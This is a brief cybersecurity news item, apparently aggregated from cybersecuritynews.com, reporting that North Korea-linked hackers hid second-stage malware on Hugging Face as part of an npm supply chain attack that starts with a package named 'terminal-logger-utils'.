HACKERS , linked to North Korea, have exploited the Hugging Face platform by embedding second-stage malware within it, transforming it into a channel for malware delivery and data exfiltration. This sophisticated npm supply chain attack specifically targets software developers globally, starting with a misleading npm package named 'terminal-logger-utils', which appears to be a standard development tool.
Hugging Face Hiding Second-Stage Malware for npm Supply Chain Attack
CyberSIXT Evidence Panel
Primary Source
cybersecuritynews.com
Article by CyberSIXT